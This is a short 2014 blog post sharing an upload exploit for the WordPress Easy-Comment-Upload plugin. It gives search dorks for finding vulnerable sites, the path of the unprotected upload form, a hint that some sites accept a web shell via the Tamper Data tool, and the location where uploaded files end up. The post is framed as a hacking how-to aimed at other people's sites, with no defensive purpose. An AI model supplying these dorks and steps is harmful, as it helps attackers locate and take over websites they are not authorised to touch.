Wednesday, 15 January 2014

Wordpress: Easy-Comment-Upload




Hello guys, today i'm going to share an upload vulnerability exploit in wordpress. but today i'm not going to write a long tutorial, but just give you the important points of the exploit.


Finding Vulnerable Target

Dorks:  "inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php" 
              /wp-content/plugins/easy-comment-uploads/upload-form.php
              Index of /wp-content/plugins/easy-comment-uploads



Exploiting Target

Exploit : /wp-content/plugins/easy-comment-uploads/upload-form.php


You can upload .txt files and images to the sites, but only certain site can be upload shell using tamper data.

After you have successfully uploaded your file, your file will be at

/wp-content/uploads/YEAR/MONTH/FILENAME

Example : 

www.site.com/wp-content/uploads/2011/05/bcc.txt


That's all. Hope you understand. 

Have a problem? leave a comment below :D